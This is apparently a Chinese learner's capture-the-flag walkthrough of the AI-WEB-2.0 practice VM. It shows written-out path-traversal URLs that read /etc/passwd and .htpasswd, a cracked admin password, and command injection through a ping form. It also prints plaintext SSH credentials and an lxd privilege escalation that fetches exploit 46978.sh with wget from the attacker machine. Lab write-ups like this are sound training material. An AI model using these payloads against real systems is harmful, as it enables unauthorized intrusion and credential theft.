无法登录的靶机AI-WEB-2.0
1》》》目标信息收集
- 使用Netdiscover软件命令netdiscover发现局域网IP地址
以上是已探测到的ip内容
如何判断哪个IP是目标IP地址?
或使用fping -a -g 192.168.233.0/24命令 仅仅显示IP地址的即为已探测到的端口
探测结果有
192.168.233.1
192.168.233.131
192.168.233.134
已知192.168.233.131是我们kali虚拟机的IP地址。192.168.233.1为网关 那么192.168.233.134即为靶机IP
使用nmap命令查看对应端口
nmap -sS -sV -A -n 192.168.233.134
由上述结果看到 22 80 端口以进行开放
尝试访问192.168.233.134:80
到达登录页面 注册一个用户登录查看情况
到达登录界面后退出 使用drib扫描web目录
dirb http://192.168.233.134
--不明白这里红框中为什么要留意这里的内容。
对于扫描出的三个网页链接分别进行了登录
index页面即为登录页面
server-status页面显示无权访问
webadmin则是需要输入账号密码
至此目标信息收集完成
2》》》目标穿越漏洞
由登录后界面得知网站为文件分享 包含FileSharing内容
使用searchsploit命令搜索FileSharing的文件漏洞
可以查看到以上文件目录
查看扫描到文件内容
47659.txt 为与upload相关的内容
40010.html 为主页HTML相关内容
40009.txt出现了passwd的敏感字样 并且该页面关系与下载有关
在浏览器中尝试访问passwd文件内容 访问后下载了文件........................_etc_passwd
打开文件查看内容
--为什么锁定红框处内容 并且知道后2处为用户名称呢
--是否因为与root对应的目录相同才确定其为用户
获取到两个用户对应名称 aiweb2 与 n0nr00tuser
读取apache文件配置
--从哪里获取到的这个apache文件的位置,为什么要获取该文件。
192.168.233.134/download.php?file_name=../../../../../../../../../../../../../etc/apache2/sites-enabled/000-default.conf
文件中此处看到passwd密码文件内容
通过192.168.233.134/download.php?file_name=../../../../../../../../../../../../..//etc/apache2/.htpasswd获取到passwd文件
文件中记录了加密的内容
aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
这段加密破解
--目前不清楚密码破解流程,根据靶机介绍给的字典进行密码破解
--破解过程kali系统操作问题未能实现,需后续补充
aiweb2admin/c.ronaldo 最终破解的账号密码
3》》》命令执行漏洞
获取到账户密码后重新登录
http://192.168.233.134/webadmin
登录后后边加上robots.txt访问文件
http://192.168.233.134/webadminrobots.txt
具体为什么访问此页面解释如下
-------------------------------------------------------------------------------------------
robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统安装了Notepad,就可以创建和编辑它
[1] 。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。
当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。百度官方建议,仅当您的网站包含不希望被搜索引擎收录的内容时,才需要使用robots.txt文件。如果您希望搜索引擎收录网站上所有内容,请勿建立robots.txt文件。
如果将网站视为酒店里的一个房间,robots.txt就是主人在房间门口悬挂的“请勿打扰”或“欢迎打扫”的提示牌。这个文件告诉来访的搜索引擎哪些房间可以进入和参观,哪些房间因为存放贵重物品,或可能涉及住户及访客的隐私而不对搜索引擎开放。但robots.txt不是命令,也不是防火墙,如同守门人无法阻止窃贼等恶意闯入者。
-------------------------------------------------------------------------------------------
访问后的页面
根据文件内容提示获取以下两个路径
http://192.168.233.134/webadmin/H05Tpin9555/
http://192.168.233.134/webadmin/S0mextras/
第一个页面中为ping测试的内容,可以通过命令执行漏洞方式来获取其他内容
而第二个页面中提示寻找一些有趣的东西在本文件夹中
首先在ping页面中输入127.0.0.1查看结果
显示为ping IP的反馈
使用管道符分割后再提交可以看到发生了变化
127.0.0.1|ls
发下其读出了文件夹下目录
已知此页面与需要查看文件页面为同级 如果返回上级页面再进入S0mextras下有可能会获取到对应的文件内容
使用
127.0.0.1|find ../S0mextras/ . -type f 2>/dev/null
获得以下结果
可以看到隐藏文件 .sshUserCred55512.txt
http://192.168.233.134/webadmin/S0mextras/.sshUserCred55512.txt
通过URL查看该文件 获得结果
账号:n0nr00tuser 密码:zxowieoi4sdsadpEClDws1sf
使用其登录ssh 登录成功
至此成功登入对应服务器
4》》》提权
登录到服务器后
id
获取用户信息
uname -a
获取内核信息
cat /etc/os-release
获取系统信息
查看本系统是否有提权漏洞
使用命令searchsploit linux 18.04
将存在漏洞的sh脚本文件复制到共享目录备用
cp /usr/share/exploitdb/exploits/linux/local/46978.sh /var/www/html
开启apache2服务
service apache2 start
利用漏洞文件需要下载build-alpine
下载好后再kali系统中解压 解压后运行
./build-alpine
生成日期时间的gz压缩包
使用kali ssh链接到目标靶机,使用之前获取的账号密码
ssh n0nr00tuser@192.168.233.134
命令获取漏洞文件以及压缩包
wget http://192.168.233.131/alpine-v3.16-x86_64-20220608_2136.tar.gz
wget http://192.168.233.131/46978.sh
提升文件控制权限
chmod 777 46978.sh
chmod 777 alpine-v3.16-x86_64-20220608_2136.tar.gz
普通用户使用如下命令获取权限的提升
./46978.sh -f alpine-v3.16-x86_64-20220608_2136.tar.gz
5》》》获取flag
获取权限后使用命令find / -name flag*
找到对应的flag文件即可打开